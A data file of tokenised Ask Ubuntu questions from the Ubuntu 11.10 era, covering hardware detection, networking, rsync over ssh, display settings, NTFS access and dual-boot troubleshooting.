92973	hp-g64-455sx not detecting the webcam	i have a hp-g64-455sx laptop . windows was corrupted so i decided to install ubuntu 11.10 on it . all things were working properly but my webcam is not working . last time i used my webcam was 3 weeks ago . how do i fix this error i have googled a lot but did n't find anything ? here is the lspci output : lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 02:00.0 network controller : ralink corp. rt3090 wireless 802.11n 1t/1r pcie 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) here the lsusb output : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 003 : id 148f:1000 ralink technology , corp .
92976	ubuntu hangs after booting	i installed ubuntu 11.10 on my pc but it hangs after os is booted . when i load from live cd it works fine . i checked my hardware on all tests are succeed . could you help me in solving my problem ?
92978	how to enable remote desktop connection in ubuntu 9.04 using command line . ( using putty )	how to enable remote desktop connection in ubuntu 9.04 using putty ?
92981	paswordless rsync over ssh without key authentication [ un-safe ]	i want to set up an rsync job that would connect through ssh . i have my computer ( backup @ myhost ) and the remote host ( test @ remhost ) and i need to backup the folder ~/something with all it 's contents . the ssh user test only has read access to all files and folders in the ~/ folder . i want to use rsync to copy the test @ remhost : ~/something folder to the backup @ myhost : ~/bak folder . for this purpose i use the following command via bash on ubuntu 11.10 ( oneiric ) : rsync -avz -e ssh test @ remhost : ~/something/ ~/bak/ after hitting enter i get this : test @ remhost 's password : i type the password and the rsync works . i want to make the above command to automatically input the password and pass it as a parameter or to input it automatically and start the job . i tried executing rsync -avz -e ssh test : password @ remhost : ~/something/ ~/bak/ but it still asks for the password and it 's annoying . i do n't want to hear about any kind of keys ( rsa , dsa or any other ) . i just want a simple command that would log me in and do the job . edit : a possible scenario could be , if public key authentication is disabled and you ca n't change this . e.g . if you use openssh , you 'd need root privileges on the server in order to edit the file sshd_config and to add pubkeyauthentication yes . edit : this is what finally worked for me : sshpass -p 'sshpassword ' rsync -- progress -avz -e ssh test @ remhost : ~/something/ ~/bak/ please note that this method is not considered secure as it sends the password in plain text and it 's vulnerable to man-in-the-middle attacks . it is advised to use the key athentication for a stronger security .
92985	gnome 3 application theme in kde	i am using kde 4 and when i run any gnome 3 application it looks really bad , how i can make gnome 3 applications have themes like in unity and gnome 3 shell . thanks in advance !
92988	how to enable rdp on kvm	i installed kvm on a ubuntu natty server . i created a windows xp pro virtual machine that works perfectly and catch up with vnc , follow the setup string : < graphics type='vnc ' port='5900 ' autoport='no ' listen='0.0.0.0'/ > but i would like to use rdp : < graphics type='rdp ' port='3389 ' autoport='no ' multiuser='yes ' / > when i start the virtual machine i get the following error : kwm @ root : ~ # virsh start winxp1 error : unable to start domain winxp1 error : unsupported configuration : unsupported graphics type 'rdp' i must add a module or a library to make it work ? tx in advance
92989	frequency not supported when booting / frecuencias no soportadas al arrancar	edit , courtesy of google translate : i just installed ubuntu 11.10 with my windows 7 and when booting i get a black screen with a square moving across the screen that says `` unsupported frequencies . '' after a minute i switch leads to ubuntu users , but never gives me to choose windows or anything . i wish i could fix it now that i have all my stuff in windows and do not want to lose them . thanks in advance acabo de instalar ubuntu 11.10 junto a mi windows 7 , y al arrancar el ordenador me sale una pantalla negra con un cuadrado moviéndose por toda la pantalla que dice `` frecuencias no soportadas '' . al cabo de un minuto me lleva al selector de usuarios de ubuntu , pero en ningún caso me da a elegir windows ni nada . me gustaría poder arreglarlo ya que tengo todas mis cosas en windows y no quisiera perderlas . gracias de antemano
92990	how to change my ubuntu email address setting ?	when i use mutt under ubuntu like below , my email address is shown as maemo @ maemo-tomxue . i want to change it but did n't find how to do it ? y : send q : abort t : to c : cc s : subj a : attach file d : descrip ? : help from : maemo maemo @ maemo-tomxue to : hello @ what.com cc : bcc : subject : 111 reply-to : fcc : ~/sent mix : security : none -- attachments - i 1 /tmp/mutt-maemo-desktop-1000-4182-199622
92996	lost panel transparency and gain 2 more workspaces after installing tight vnc server	last day i have installed tight vnc server on my pc . after reboot my window-decoration options were changed , two more workspaces were added and xfce-panels went solid color ( previously they were transparent ) . the problem is that i can not change my panels to be transparent - this option is no longer available . any ideas how to fix it ?
92998	2nd monitor not detected by nvidia server settings	i formatted my computer & installed ubuntu 11.10 64-bit . i have dual-monitors connected to a 1gb nvidia card . previously , it was working fine . after installing , both monitors did get detected . but after installing restricted drivers ( nvidia ) , the 2nd monitor does n't show up in nvidia x server settings . i have just one - x screen 0 . there should be a x screen 1 . is there a way to manually fix this ?
93000	ubuntu one is syncing back files when it should n't	i have a folder with a number of files , among them a .tex ( latex ) file that i 'm working on . while i 'm working on this file ubuntu one gets an older version from the web and puts it locally - and i lose my work ! this has happened quite a few times and i 'm about to remove ubuntu one from my laptop . nobody else is updating this file anywhere else ( as a matter of fact at the present i only have one laptop sync to the web , the one i work on ) . i 'm running it on ubuntu 11.10 , and this file gets saved often locally . what should i do to avoid the above issue ?
93004	installing xampp for all user	is there anyway to install xampp for all the user on ubuntu 11.04 ? it would be great and i hope there are some ways . because it 's disgusting to log off every time to run xampp . i 'm new to linux .
93008	the problem with avantbrowser	i 've recently asked a question about choosing an operating system and i was adviced to try ubuntu . so did i. unfortunatelly , ie9 does n't work in this os so i was adviced to try an alternative browser and i decided to try avantbrowser which is pretty similar to ie9 and compatible with it . but there 's a problem because i downloaded it and ubuntu ca n't execute a simple .exe file . what is a problem ? and how to solve it ? i was n't able to find a solution on ubuntu forums and i 'm asking for your help . thank you very much !
93011	xubuntu 11.10 wo n't save my settings	i am using xubuntu 11.10 , and every time i reboot my computer , my settings are erased . namely my default browser , preferred applications settings and my touchpad settings . does anyone know how to make these settings permanent ? tap-to-click is super annoying .
93012	pulseaudio not using card i want output from	sound on ubuntu stopped working ( however on windows 7 it works ) . i just tried ubuntu-bug audio and gave the following output : you do n't seem to have configured pulseaudio to use the card you want output from ( internal audio - hda intel pch ) . you can fix that using pavucontrol or the gnome volume control . and the output below is when pulseaudio is written on command line e : [ pulseaudio ] pid.c : daemon already running . e : [ pulseaudio ] main.c : pa_pid_file_create ( ) failed . what should i do ? thanks in advance . i have run alsamixer and the card is not muted .
93013	how do i restart the keyring server ?	sometimes the wifi just tries to connect to a network for a long , long time , and then just fails , and i need to restart the computer to get it working . i tried to pkill the nm-applet and running it from the terminal . that provides some feedback , and it seems to be an issue related to keyring manager not being available . how do i restart the keyring manager ?
93014	retrieve google chrome ubuntu favicon	where the favicon .ico file is stored in ubuntu 11.10 ? how can i extract the .ico file from the chrome cache ?
93016	how to identify relation between hid /dev/input/* files and real hardware ?	my friend had problems with touchscreen ( they are gone after two reboots ) after her sister used her laptop and when i tried to help i did n't find a way to identify /dev/input/* files . one way i 've found was to grep in $ dmesg ( /var/log/kern.log ) but it does n't work for me . does any standard method exist ?
93018	does disconnecting from an ssh session kill it ?	i disconnect frequently by lag/timeouts or similar from a machine i am connected in to via ssh and i was wondering if my sessions are still active somewhere or if they close/logout after a certain time ? if they are not disconnected , is there a way to connect back in to the session ? ( fyi , this is a default install/nothing funky ... ssh is in default configuration ) .
93021	do gnome shell extensions have any impact on system speed ?	i loved the various extensions available for gnome shell but i do n't want to enjoy their benefits at the cost of slowing the system down . is there any known impact ?
93022	error while firing up wubi installer on windows xp	i 've tried to run the wubi installer on windows xp , but it throws a really strange exception . it looks like this : header : 'windows - no drive' content : 'exception processing message c0000013 paramters 75b0bf9c 4 75b0bf9c 75b0bf9c' it doesnâ´t matter which button i press cause nothing happens . the only way to stop that annoying window is to kill the pyrun.exe process . i 've also checked for an error log , like the one i found on the windows 7 netbook , but nothing . any help would be very nice . greetings
93028	how to install tar.gz on ubuntu 11.10 ?	i just installed ubuntu and i want to install adobe flash player and im not very familiar with terminal . i did some searches in google but i still cant get it . can someone help me please : s
93029	does ubuntu one client window need to be open for sync'ing to occur ?	does the window for the ubuntu one client need to be actually open ( and in my windows or ubuntu `` taskbar '' ) for the sync'ing to actually occur ? it would be nice if the sync process could occur without having the window always lying around . dropbox does n't require a window to be open , for example .
93030	why does n't canonical and ubuntu run more ads ?	ubuntu , being a hunk of an os , is not giving out ads ! i mean , see microsoft for instance , whichever blogs or websites you visit you get a nice girl holding a boquet of flowers and saying windows 7 , beauty and brain . in my country , india , ubuntu is so unknown to non-geek people that they wonder if it is some alien product , why doesnt canonical think of it ? doesnt an ad in some newspaper exponentially increase its users ?
93032	fan always on ( laptop hp g62 )	recently , i installed ubuntu 11.10 on my hp g62 . but after i installed i noticed that my laptop fan always on . kindly guide me on how this fix this issue . i 'm new to this new lovely o.s . thanks !
93034	suspend suddenly stopped working	i 'm running ubuntu 11.10 , and it appears the suspend feature suddenly stopped working . now , when i close the laptop lid , the machines powers off . to my knowledge , i have n't made any configuration changes to suspend when laptop lid is closed . it was working perfectly yesterday . what can i do to diagnose and hopefully fix this issue ?
93035	how to setup a static ip in ubuntu ? where i need network , broadcast , dns parameters to fill in from my isp ?	i have a public ip as below which is static ( my isp provided ) as below : ip address : x.x.146.50 subnet mask : 255.255.255.240 default gateway : x.x.146.49 dns1 : x.x.1.196 dns2 : x.x.7.196 but what is my network , broadcast and dns ( this scared me for ages , looking for a easy way to do 100 % accurate calculating/math ) . iface eth0 inet static address x.x.146.50 netmask 255.255.255.240 network ? ? ? ? ? ? ? ? ? ? ? ? gateway x.x.146.49 broadcast ? ? ? ? ? ? ? ? ? follow up : ( short cut ) $ ipcalculator 8.8.8.8/28 address : 8.8.8.8 00001000.00001000.00001000.0000 1000 netmask : 255.255.255.240 = 28 11111111.11111111.11111111.1111 0000 wildcard : 0.0.0.15 00000000.00000000.00000000.0000 1111 = > network : 8.8.8.0/28 00001000.00001000.00001000.0000 0000 hostmin : 8.8.8.1 00001000.00001000.00001000.0000 0001 hostmax : 8.8.8.14 00001000.00001000.00001000.0000 1110 broadcast : 8.8.8.15 00001000.00001000.00001000.0000 1111 hosts/net : 14 class a 1 ) it tells me broadcast what to copy and paste 2 ) it tells me netmask what to copy and paste 3 ) it tells me network what to copy and paste now its easy ! i was always finding them complex in my head to do manual calculation and server is down for 20 days : p. not not anymore .
93038	lenovo laptop dims always on reboot	i always have to press by fn + brightness increase key in ubuntu . i have switched off all the power management and still this happens . i am on a lenovo ideapad u260 and ca n't to seem to set the brightness to same constant ( high ) at all times .
93039	can not download softwares from the software center	i just installed ubuntu 11.10 on my computer that has windows7 on it as well . i was first trying to upload chromium and i got this error : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time this came up when i was trying to download chromium , skype and vlc , though there was no problem downloading geany or 7zip . once again , i have n't done anything before on ubuntu . any ideas ?
93040	dell u2711 monitor usb hub does not recognize/auto-mount usb disks	i recently purchased a dell u2711 display . the monitor works well in ubuntu 11.10 , that is , auto recognized and working at full resolution with the included dvi-d ( dual link ) cable . my problem is that the monitor 's built in usb hub does not recognize usb disks and devices . these disks and devices work perfectly if plugged into the computer directly . has anyone encountered this problem ? if so , has anyone devised a solution ? thanks edit : the monitor hub is connected to tested and functional usb ports on the computer . edit : dvd-d to dvi-d cable
93047	what can i do with ubuntu ?	well i have dual booted system , i have windows7 + ubuntu.. but on ubuntu i do n't know what to do , what should i do with ubuntu like is there anything entertainment to do ? like i do n't have gonme desktop and i do n't know how to .. the system-prefenceses arent located on my desktop i do n't know what should i do ? tell me anything ..btw how can i install gnome ? thank you .
93049	how can i stop the ubuntu software center from autostarting in xubuntu ?	i recently installed xubuntu 11.10 and am completely updated . software sources used include proposed as well as backports ( in case that means anything ) . my issue is that the ubuntu software center autostarts on login . i 've already checked my startup apps in 'session and startup ' through the settings manager and it is n't set there . is this just a 'deal with it ' situation like unity in ubuntu ? or is there some glaringly obvious setting that i 'm missing ? been considering installing 10.04 and just upgrading features a la carte to avoid 11.10 bugs . any ideas ? oh and there is no check in the save session box . usc is closed when i shut down anyway .
93051	windows ca n't access linux made folders in external hdd	i have an external hdd with 3 partitions - 2 ntfs and 1 fat32 file systems . in linux i made folder in one of ntfs partitions , downloaded some stuff , and wanted to access through win7 ; but windows ca n't see those folders . other folders are still there . how can i access those folders made by linux ? btw , i use ubuntu 11.10 with gnome and windows 7 ( 320gb is my external hdd ) . sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbe2dbe2d device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 61646847 30720000 7 hpfs/ntfs/exfat /dev/sda3 61646848 225486847 81920000 7 hpfs/ntfs/exfat /dev/sda4 225488894 312580095 43545601 5 extended /dev/sda5 225488896 233299967 3905536 82 linux swap / solaris /dev/sda6 233302016 312580095 39639040 83 linux warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x73696d20 device boot start end blocks id system /dev/sdb1 63 65529134 32764536 b w95 fat32 /dev/sdb2 65529135 625137344 279804105 f w95 ext 'd ( lba ) /dev/sdb5 65529198 270325754 102398278+ 7 hpfs/ntfs/exfat /dev/sdb6 270325818 625137344 177405763+ 7 hpfs/ntfs/exfat cat /etc/mtab /dev/sda6 / ext4 rw , errors=remount-ro , user_xattr , commit=0 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 fusectl /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfs-fuse-daemon /home/vindzigelskiu/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=vindzigelskiu 0 0 /dev/sdb1 /media/1d06-2ab4 vfat rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelpe r=udisks 0 0 /dev/sdb5 /media/adata\04097gb fuseblk rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions 0 0 /dev/sdb6 /media/adata\040169gb fuseblk rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions 0 0
93056	copy file to same directory with appended filename via ssh bash script	how would i copy a batch of files into the same directory with an appended filename via ssh bash script ? for example . /path/files/file /path/files/file-20120105 the trick is for it to be a one liner so i do n't have to do any fancy for loop or some other mechanism to pass it via ssh .
93060	how do i enable global menu for qt applications ?	is there a way to enable the global menu for qt applications on unity ? by default they do not use it .
93066	how to get my ir remote to work ? lirc ca n't see it	i 'm using ubuntu 11.10 ( amd64 ) and i 'm trying to get my infrared remote control working . the ir device is a part of a dvb-t usb stick ( based on a rtl2832u chip ) . i 'm using these drivers - it 's the only way of getting this device to work under 11.10 that i found . it 's a big impromevent from previous ubuntu version , where i had to edit the driver 's code . the device works quite great - and the ir part of it works , too . the driver 's page says that the code it 's in alpha stage , but i 'm pretty sure that my issue has nothing to do with that . if , and only if driver 's module is loaded with parameter rtl2832u_rc_mode=2 ( which means `` use nec protocol for ir '' ) the remote kind of works , i can see this by running cat /dev/.. ../input6 - when i press a button , random letters appear . the remote works just like a keyboard , but keys are totally messed up - when i press '5 ' the volume goes down , etc . i would like to use lirc to fix that , but lirc ca n't detect my device ( i.e . irw shows nothing ) . i suspect , it 's because something gets into control of the device and sets it up as a keyboard . lirc seems to be working , it 's kde settings module works too , but it just does n't detect the device . the lirc page describes this issue , but since 2009 - the last year when that page was updated , ubuntu moved from hal ( described there ) to devicekit , rendering provided instruction useless . i had a similar issue with my previous remote , but the keys were not messed up so much - the remote was usable , so i gave up trying to get lirc working . i tried the answer provided here , but it changed nothing . i also tried forcing lircd to use my device , but this did n't work too : for i in /sys/class/input/input* ; do echo -n `` $ ( basename `` $ i '' ) : `` ; cat `` $ i/name '' ; done shows input0 : power button input1 : power button input2 : logitech logitech usb keyboard input3 : a4tech ps/2+usb mouse input6 : ir-receiver inside an usb dvb receiver but when i run : lircd -n -- device=name='ir* ' as root ( also tried with the full name ) i always see : lircd-0.9.0 [ 3983 ] : lircd ( default ) ready , using /var/run/lirc/lircd lircd-0.9.0 [ 3983 ] : accepted new client on /var/run/lirc/lircd lircd-0.9.0 [ 3983 ] : could not get file information for name=ir* lircd-0.9.0 [ 3983 ] : default_init ( ) : no such file or directory lircd-0.9.0 [ 3983 ] : failed to initialize hardware so , how to set up lirc with devinput driver in such case ?
93072	bluetooth lost functionality on hp-mini 110 in december 2011	in 11.04 and before , i could do all operations to my sony-ericsson phone including using it as a 3g internet interface . this can still be demonstrated by using a live cd . the first problem with 11.10 was that once the 3g internet interface was used , the computer would no longer suspend or hibernate because `` bluetoothd '' would not `` freeze '' after 20 seconds of trying . however , since around the end of december , the only bluetooth function that works is `` send file to device '' . any attempt to connect the network from the network manager icon or to connect or browse from the bluetooth icon silently fails . dmesg reveals nothing in these cases ; i do n't know what other logs i should look at . i tried rebooting with the previous kernel ( 3.0.0-13 ) but it behaved the same as the new one ( 3.0.0-14 ) . thanks
93079	i dont have wireless internet	im using ubuntu 11.10 on windows 7 with the vmware program . my laptop is toshiba satellite p505-s8980 and i connected to the internet with wifi . whem i 'm using my windows 7 i have wifi networks , but when i open ubuntu ( on the vmware ) i have only wired connection available ( which is weird becaouse i do n't have any internet wire connected to the computer ) and no wireless connection ( and i need that for something ) my network adapter is : realtek trl8191se wireless lan 802.11n pci-e. ( as you can see the `` liverant '' network is connected and i can use it with my windows 7 ) any help ? i tried a lot of things and still nothing helped me .
93080	xflock is so much ugly . any alternative ?	the xflock screen ( from xubuntu ) is so much ugly . i cant even look at it . so , i was windering if exist a way to personalize it , or substitute it with other lock . thanks .
93081	how to get display settings persistent ?	i have the following set-up : laptop with screen : 1366x768 external lcd monitor with : 1024x768 the monitor is permanently connected and recognised by the system . screen is expanded to the external monitor . but each time i login , the external monior is dark and has to be reactivated . this also happens when the monitor is active and i log out and log in as a different user . how can i prevent this ? is there a way to make configuration of the monitor settings tool persistent for all users ?
93083	how to install ubuntu on a netbook without cd ?	how to install ubuntu on a netbook without cd ?
93088	making gtk.window transparent ?	here 's my code and i simply can not figure out why my top level window does n't become transparent . xwininfo says that windows has 32 bit depth . i am running ubuntu 11.10 and if i call .set_opacity ( .5 ) on the window itself , it will become transparent . but all the content of the window too . i 'd like a transparent background , but widgets should stay opaque . i looked at the notify-osd code and they are calling set_opacity on the main window . yet , i can not figure out why other widgets on the osd stay opaque . here 's the code : # ! /usr/bin/env python from gi.repository import gtk , gdk class mywin ( gtk.window ) : def __init__ ( self ) : super ( mywin , self ) .__init__ ( ) self.set_position ( gtk.windowposition.center ) self.set_border_width ( 30 ) self.screen = self.get_screen ( ) self.visual = self.screen.get_rgba_visual ( ) if self.visual ! = none and self.screen.is_composited ( ) : print `` yay '' self.set_visual ( self.visual ) box = gtk.box ( ) btn1 = gtk.button ( label= '' foo '' ) box.add ( btn1 ) self.add ( box ) self.set_app_paintable ( true ) self.connect ( `` draw '' , self.area_draw ) self.show_all ( ) def area_draw ( self , widget , cr ) : cr.set_source_rgba ( 0 , 0 , 0 , .3 ) cr.paint ( ) # def screen_changed ( self , widget , cr ) : # self.screen = widget.get_screen ( ) # self.visual = self.screen.get_rgba_visual ( ) # if self.visual ! = none and self.screen.is_composited ( ) : # self.set_visual ( self.visual ) mywin ( ) gtk.main ( )
93089	ubuntu 11.10-windows are too slow !	i cant carry windows fastly my mouse is gone but windows is still standing and after that window just teleporting under the cursor . -.- what is that ... i am sick of this drivers problems -.- can someone help ? there is the video of the problem : http : //www.youtube.com/watch ? v=mxgonn3n1t8 & feature=g-upl & context=g2bcafdfauaaaaaaaaaa
93097	ubuntu 11.10 monitor suspend glitch help ?	my monitor gets extremely glitchy after waking it from suspending it is there any fix to this problem ? here is a picture of the issue this is right after i wake it from it being suspended .
93098	adjust resolution in xfce4 virtualbox guest guest	i have virtualbox 4.1.2_ubuntur3859 installed on an ubuntu 11.10 host , running a guest ubuntu server 10.04 with xfce4 and xorg installed with no-install-recommends . i have installed guest additions , but the maximum resolution in the display settings is 800x600 . i have read related questions : how to change resolution of the virtualbox ( ubuntu guest and host ) ? higher screen resolution in virtualbox ? upgrading virtualbox 3.2.10 breaks my guest ubuntu screen resolution ubuntu as guest os ( with vista host ) stuck at 800x600 resolution but none contain the solution to my issue . am i missing any particular packages that would allow me to change resolution ? i would like to keep the machine as small as possible .
93101	install wine64 after compilation	hi guys i just compile wine64 for ubuntu 64 because i want to run 64bits windows applications on my 64bits ubuntu . i did what it says in this guide http : //wiki.winehq.org/wine64 ( building a shared wow64 setup paragraph ) but now i dont know how to install it . i want to know to which folder apply sudo make install . so any idea ? thank you for all .
93102	problem during boot after disk check	i have an asus f3f notebook , and sometimes ubuntu asks for a disk check during boot and it finishes successfully , but after that nothing happens , i get a black blank screen and i have to shut down the laptop from the power button and boot again . what might be causing this and how could it be fixed ?
93109	ca n't write to ntfs formatted drives	i 'm not sure what has happened , but i 've all of a sudden lost write access to any of my ntfs external drives . i installed a few games and apps from the software center , and now i ca n't make new folders or copy and paste files to anything that is ntfs . everything is now read only , and i 've tried so many things to fix it , but it seems hopeless . just to check if it was n't the drives themselves , i made a little ntfs formatted truecrypt volume , and a fat formatted volume . and yes , it seems that ubuntu is blocking me from writing anything to ntfs . what happened here ? whats a way i can simply get write access to my ntfs drives , so i can just backup all my stuff . i 'll probably reinstall ubuntu . please help . update ( and thanks everyone for their quick replies ) the problem has been solved . prior to noticing that i had lost ntfs write permission , i had installed gparted from the software center , and there was an extension called ntfsprogs that came with it . during my search for a solution to the problem , i uninstalled gparted ( as that was one of the apps i installed just before the problem ) . but that did not solve the problem . i came across an app called 'ntfs configuration tool ' . when i installed this , it said that the ntfsprogs extension needed to be removed ( so i guess uninstalling gparted , did n't remove the ntfsprog extension ) . i launched the ntfs configuration tool and now i have write access to ntfs drives . unfortunately , i did n't check if i had write permission prior to launching the ntfs configuration tool , so i 'm not sure whether the ntfs configuration tool , or the un-installation of ntfsprog gave me back ntfs write permission . hopefully if another newbee encounters this problem , they 'll come across this page and know what to do .
93112	how do i repair the shut-down/log-off button ?	i use the computer with 2 users . with one user all works fine . with the second user account , the shut down and log-off buttons do not work anymore while screen locking standby and hibernation still works . ( i refer to the buttons very right of the top panel ) . how can i get back the functionality of log-off and more importantly , shut down ? thanks in advance .
93114	error with update manager and software center	i am running ubuntu 11.10 . on trying to check for updates using the update manager gui , i encounter the following error : failed to download repository information check your internet connection . details : w : failed to fetch bzip2 : /var/lib/apt/lists/partial /in.archive.ubuntu.com_ubuntu_dists_oneiric_restricted_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial /in.archive.ubuntu.com_ubuntu_dists_oneiric_universe_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial /in.archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_binary-i386_packages hash sum mismatch , w : failed to fetch http : //in.archive.ubuntu.com/ubuntu/dists/oneiric/main/i18n /index no hash entry in release file /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_oneiric_main_i18n_index , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_oneiric-updates_restricted_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . or the details varied as : w : failed to fetch bzip2 : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_oneiric_restricted_binary-i386_packages hash sum mismatch , w : failed to fetch bzip2 : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead on changing the software server to the main server and rechecking for updates , i got the following error : e : unable to parse package file /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_oneiric-backports_multiverse_i18n_index ( 1 ) the same errors were reproduced when i checked for updates using the terminal . the software center too fails to show any information on any of the applications . i am accessing the internet using a proxy server , can that be a problem ?
93115	how do i make adobe digital edition work in firefox ?	i 'm trying to access ebscohost online books . it told me i needed ade . i downloaded it and installed it within wine . i can open ade by itself and it appears to function . however , i do n't have any e-books so i ca n't test it . i even changed my firefox preferences so that to run acsm files `` use digitaleditions.exe '' . however , when i am in ebscohost and click on a link to see an `` e-book , full text '' for example , ade does n't open but some other unknown environment in the firefox window . however , the book never appears , instead , a pdf file is downloaded but it 's only one page . in the unknown environment , i can click to advance a page ( that still does n't appear in the unknown firefox page environment ) and the next page down loads as a pdf . it 's only 79k so i 'm certain it 's a single page . i just do n't want to download a book one page at a time . any help in making ade work within firefox ?
93118	error while installling qt mobility tool kit	i am installing qt mobility tool kit but it shows an error message.how to fix it 1.2.0/src/multimedia ' make [ 2 ] : warning : file makefile ' has modification time 1.1e+04 s in the future g++ -c -pipe -g -fvisibility=hidden -fvisibility-inlines-hidden -wall -w -d_reentrant -fpic -dqt_webkit -dqt_shared -dqtm_plugin_path=\ '' /home/aboobacker/desktop/qt-mobility-opensource-src-1.2.0/install/plugins\ '' -dqt_makedll -dqt_build_multimedia_lib -dhas_alsa -dqt_multimedia_qmediaplayer -dqt_opengl_lib -dqt_gui_lib -dqt_network_lib -dqt_core_lib -i/usr/share/qt4/mkspecs/linux-g++ -i . -i/usr/include/qt4/qtcore -i/usr/include/qt4/qtnetwork -i/usr/include/qt4/qtgui -i/usr/include/qt4/qtopengl -i/usr/include/qt4 -i../global -i . -iaudio -ivideo -ieffects -i/usr/x11r6/include -i../../build/debug/qtmultimediakit/moc -o ../../build/debug/qtmultimediakit/qaudiodevicefactory.o audio/qaudiodevicefactory.cpp in file included from audio/qaudiodevicefactory.cpp:60:0 : audio/qaudiodeviceinfo_alsa_p.h:57:28 : fatal error : alsa/asoundlib.h : no such file or directory compilation terminated . make [ 2 ] : * [ ../../build/debug/qtmultimediakit/qaudiodevicefactory.o ] error 1 make [ 2 ] : leaving directory/home/aboobacker/desktop/qt-mobility-opensource-src-1.2.0/src/multimedia ' make [ 1 ] : * [ sub-multimedia-make_default ] error 2 make [ 1 ] : leaving directory `/home/aboobacker/desktop/qt-mobility-opensource-src-1.2.0/src ' make : * [ sub-src-make_default-ordered ] error 2 aboobacker @ aboobacker-desktop : ~/desktop/qt-mobility-opensource-src-1.2.0 $ how to solve this ?
93124	no pysvn package in software center	there is a pysvn package but i ca n't find it in software center . any idea ?
93129	wifi connection in lubuntu 11.10	i am facing the wifi network connection problem , which was previously working absolutely fine . i have checked /etc/network/interfaces file auto wlan0 iface wlan0 inet dhcp wireless-mode managed wireless-essid my_network_name i have also tried the following command on terminal but were no use sudo ifup wlan0 fail to bring up wlan0 sudo ifdown wlan0 ifdown : interface wlan0 not configured output of $ sudo lspci |grep -i network has produce the below results 06:00.0 ethernet controller : atheros communications inc. ar242x / ar542x wireless network adapter ( pci-express ) ( rev 01 )
93130	installing ( or getting working ) ironpython	why has package with ironpython disappeared from repository ? i expected , that i would be there . is there any way to get running ironpython clearly , without compilation from source ?
93131	how do i set up my dual-boot menu after i reinstall windows ?	i installed ubuntu after windows 7 , then i used to have a menu that let me choose windows or ubuntu . then for obvious reasons i need re-install windows again , then i lost my dual boot . my computer start windows without ask me nothing .
